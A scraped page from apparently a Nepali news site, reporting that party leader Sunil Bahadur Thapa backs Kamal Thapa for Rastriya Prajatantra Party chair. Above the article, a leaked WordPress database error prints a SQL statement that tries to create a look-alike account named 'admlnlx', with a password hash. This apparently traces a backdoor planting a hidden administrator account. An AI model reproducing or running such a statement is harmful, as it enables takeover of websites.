WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BioTg2N2PCVh4zP5SO.KMPQYX9.i0u/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 12:09:23', '', 'admlnlx', 'admlnlx')
काठमाडौं, फागुन ४ –
राष्ट्रिय प्रजातन्त्र पार्टीका नेता सुनिलबहादुर थापाले पार्टी असन्न महाधिवेशन कमल थापालाई समर्थन गर्ने घोषणा गरेका छन् । थापाले बुधबार विज्ञप्ति जारी गर्दै सहमतिबाटै पार्टी अध्यक्ष चयन गर्नु पर्नेमा जोड दिएका छन् । नभए आफू र आफ्नो टिमले अध्यक्षमा कमल थापालाई समर्थन गर्ने उनलदे बताएका छन् ।
राप्रपा र राप्रपा नेपालको एकतापछि बनेको राप्रपाको महाधिवेशन पर्सि शुक्रबार सुरु हुँदैछ ।